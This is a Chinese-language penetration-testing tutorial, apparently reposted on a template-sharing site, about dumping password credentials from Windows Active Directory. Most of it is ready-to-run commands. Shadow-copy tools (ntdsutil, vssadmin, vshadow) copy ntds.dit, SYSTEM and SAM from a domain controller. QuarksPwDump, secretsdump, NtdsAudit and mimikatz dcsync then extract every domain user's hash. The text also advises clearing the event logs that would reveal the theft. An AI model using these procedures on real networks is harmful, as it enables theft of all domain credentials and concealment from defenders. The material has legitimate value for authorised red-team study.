域内密码凭证获取

这篇具有很好参考价值的文章主要介绍了域内密码凭证获取。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Volume Shadow Copy

活动目录数据库

ntds.dit:活动目录数据库,包括有关域用户、组和成员身份的 信息。它还包括域中所有用户的哈希值。

ntds.dit文件位置:%SystemRoot%\NTDS\NTDS.dit

system文件位置:%SystemRoot%\System32\config\System

sam文件位置:%SystemRoot%\System32\config\SAM

%SystemRoot%是系统安装目录,C:\Windows

AD DS数据库存储:

  • 由ntds.dit文件构成
  • 默认存储在所有域控制器上的%SystemRoot%\NTDS文件夹中
  • 只能通过域控制器进程和协议访问

由于Windows阻止这些文件的标准读取或复制操作,因此必须使用特殊技术来获取副本

Volume Shadow Copy(卷影复制

方法一:ntdsutil命令行工具获取

交互式:

ntdsutil
snapshot
activate instance ntds
create
mount [GUID]    //mount挂载
unmount [GUID]    //copy完成后再执行卸载
del [GUID]
quit
quit

ntds文件,内网渗透,安全

非交互式:

1、查询当前系统的快照

ntdsutil snapshot "List All" quit quit
ntdsutil snapshot "List Mounted" quit quit

 2、创建快照

ntdsutil snapshot "activate instance ntds" create quit quit

3、挂载快照

ntdsutil snapshot "mount {GUID}" quit quit

 4、卸载快照

ntdsutil snapshot "unmount {GUID}" quit quit

5、删除快照

ntdsutil snapshot "delete {GUID}" quit quit

终极指令:

ntdsutil "activate instance ntds" ifm "create full c:\hjw" quit quit

方法二:vssadmini

VSSAdmini:是Windows系统提供的卷影复制服务(VSS)的管理工具,域环境默认安装。

  • 用于创建或 删除卷影复制副本,列出卷影副本的信息
  • 用于显示所安装的所有卷影副本写入程序和提供程序
  • 改变卷影副本储存空间的大小

1、查询当前系统的 快照

vssadmin list shadows

2、创建快照

vssadmin create shadow /for=c:

 3、获得shadow copy volume name

\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10

 4、复制ntds.dit

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\windows\NTDS\ntds.dit c:\ntds3.dit

5、删除快照

vssadmin delete shadows /for=c: /quiet

方法三:vshadow

Vshadow:是一个简单的指令行工具,它允许任何人创建卷影拷贝。系统默认不支持,可以在Microsoft Mindows Software Development Kit(SDK)中获取工具。

1、查询当前系统的快照

vshadow.exe -q

ntds文件,内网渗透,安全

2、创建快照

vshadow.exe -p -nw C:

详细参数说明

-p   -> persistent,备份操作或是重启系统不会删除
-nw -> no writers,用来提供创建速度
C:  -> 对应c盘

ntds文件,内网渗透,安全

获得SnapshotSetID,SnapshotID,Shadow copy device name

3、复制ntds.dit

copy [Shadow copy device name]\windows\ntds\ntds.dit c:\ntds.dit

这个就是对应上面的第三个黄色框框

ntds文件,内网渗透,安全

4、删除快照

vshadow -dx=ShadowCopySetId
vshadow -ds=ShadowCopyId

ntds文件,内网渗透,安全

扩展:

  • 调用Volume Shadow Copy服务会产生日志文件,位于System下,Event ID为7036

执行

ntdsutil snapshot "activate instance ntds" create quit quit

会额外产生EventID为98的日志文件

所以要记得清理痕迹

  • 访问快照中的文件

1、创建一个快照文件

vssadmin create shadow /for=c:

2、查看快照列表

vssadmin list shadows

3、创建符号链接访问快照中的文件

mklink /d c:\hjw [卷影副本] 

删除符号链接

rd c:\hjw

NinjaCopy

通过NinjaCopy获取域控服务器NTDS.dit文件

没有调用Volume Shadow Copy服务,所以不会产生7036

解密ntds.dit

1、QuarkPwDump

Quarks Pw Dump是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地账户、域账户、缓存的域账户和Bitlocker。

  • 修复复制出来的数据库文件
esentutl /p /o ntds.dit

ntds文件,内网渗透,安全

  • 使用QuarksPwDump直接读取信息并将结果导出至文件
QuarksPwDump.exe --dump-hash-domain --ntds-file ntds.dit --output cndragon.txt

ntds文件,内网渗透,安全

  • 查看里面的数据
type cndragon.txt

ntds文件,内网渗透,安全

2、Secretsdump

impacket套件中的secretsdump.py脚本解密,速度有点慢

secretsdump.exe -sam sam.hiv -security security.hiv -system sys.hiv LOCAL
secretsdump.exe -system system.hive -ntds ntds.dit LOCAL

3、NtdsAudit

可以 十分高效的破解ntds文件并将全部域域用户信息导出方便查找域用户状态。

将ntds.dit文件和SYSTEM文件放在同已目录下执行命令

NtdsAudit.exe "ntds.dit" -s "system.hive" -p pwdump.txt --users-csv users.csv

这里很遗憾我没有操作成功

ntds文件,内网渗透,安全

4、mimikatz

Mimikatz有一个功能(dscync),它可以利用目录复制信息(DRS),从NTDS.DIT文件中提取密码hash值。这里需要在域控主机上进行操作

  • 通过dcsync直接获取cn-dragon.cn域内所有用户hash
lsadump::dcsync /domain:cn-dragon.cn /all /csv

ntds文件,内网渗透,安全

  • 查看所有用户的所有详细信息
privilege::debug    //必须先执行这个指令获取权限
lsadump::lsa /inject

ntds文件,内网渗透,安全文章来源地址https://www.toymoban.com/news/detail-615877.html

到了这里,关于域内密码凭证获取的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 渗透实战:dedeCMS任意用户密码重置到内网getshell

    ## 一、简介 DedeCMS 是一个基于 PHP 和 MySQL 的开源 CMS 系统,它是国内很多网站使用的 CMS 系统之一。在使用 DedeCMS 的过程中,我们需要重视其安全性,因为安全问题可能会导致网站数据泄露、网站被黑、系统被入侵等严重后果。本文将介绍如何进行 DedeCMS 安全测试。 1、环境准

    2024年02月06日
    浏览(41)
  • 内网渗透之横向移动wmi&smb&密码喷射CrackMapExec

    wmi可以通过hash或明文进行验证,不会在系统日志中留下痕迹,使用139端口 复现环境: god.org win2008 dc win2012sql win2008 web 准备: cs上线 win2008web 提权利用ms14-058 抓取hash和明文密码(当获取到其他主机就重复提权和抓取密码) 扫描存活主机,扫描端口 生成正向连接木马,上传至根

    2023年04月22日
    浏览(43)
  • 内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp

    微软为了防止明文密码泄露发布了补丁KB2871997,关闭了Wdigest功能。 当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。 windows读取密码出现的情况 强开注册表,可以读取明文密码

    2024年02月04日
    浏览(47)
  • 内网渗透-cobaltstrike之cs上线获取shell

    CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马

    2024年02月10日
    浏览(48)
  • 《WEB安全渗透测试》(37) 内网渗透神器:fscan使用攻略

    Fscan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 这

    2024年02月13日
    浏览(42)
  • 内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)

    内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。通过映射端口,让外网的电脑找到处于内网的电脑。端口映射,就是NAT地址转换的一种,功能就是把在公网的地址转翻译成私有地址。在局域网内部的任一PC或

    2024年02月08日
    浏览(41)
  • 网络安全(黑客)内网渗透基础知识

    0x01 内网概述 内网也指局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的历程安排、电子邮件和传真通信服务等功能。 内网是封闭型的,它可以由办公

    2024年02月13日
    浏览(59)
  • 内网安全:Cobalt Strike 工具 渗透多层内网主机.(正向 || 反向)

    Cobalt Strike 是一款以 metasploit 为基础的 GUI 的框架式渗透工具,又被业界人称为 CS。拥有多种协议主机上线方式,集成了端口转发,服务扫描,自动化溢出,多模式端口监听,winexe 木马生成,win dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑;钓鱼攻击包括:站点克

    2024年02月11日
    浏览(48)
  • 【网络安全】DVWA靶场实战&BurpSuite内网渗透

    我们先来认识一下BurpSuite中有哪些攻击模式,然后开始实战操作 下面攻击案例即将使用,对单个参数进行攻击破解 联想战争中狙击手的作用,一次只能击杀一名敌人 联想古代的攻城锤,特点就是攻击范围比狙击手大,但是效率不一定高 可以设置多个攻击字段,但是payload值

    2024年02月13日
    浏览(56)
  • 网络安全内网渗透之信息收集--systeminfo查看电脑有无加域

    systeminfo输出的内容很多,包括主机名、OS名称、OS版本、域信息、打的补丁程序等。 其中,查看电脑有无加域可以快速搜索: 输出结果为WORKGROUP,可见该机器没有加域: systeminfo的所有信息如下: C:UsersAdministratorsysteminfo 主机名:           USER-20210123NC OS 名称:          M

    2024年02月07日
    浏览(60)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包